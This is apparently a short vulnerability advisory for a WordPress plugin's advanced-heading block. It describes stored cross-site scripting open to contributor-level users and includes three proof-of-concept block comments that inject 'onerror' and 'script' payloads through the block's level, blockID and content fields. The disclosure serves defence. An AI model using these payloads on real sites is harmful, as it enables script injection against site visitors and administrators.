Description The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the below code in a post while in Code Editor mode:
<!-- wp:ub/advanced-heading {"blockID":"aaa","level":"img src=x onerror=alert(/XSS-level/)","fontSize":29,"fontFamily":"Cardo","lineHeight":35} /-->
<!-- wp:ub/advanced-heading {"blockID":"\u0022src onerror=alert(/XSS-BlockID/)//","level":"img","fontSize":29,"fontFamily":"Cardo","lineHeight":35} /-->
<!-- wp:ub/advanced-heading {"blockID":"a","level":"script","content":"alert(/XSS-content/)","fontSize":29,"fontFamily":"Cardo","lineHeight":35} /-->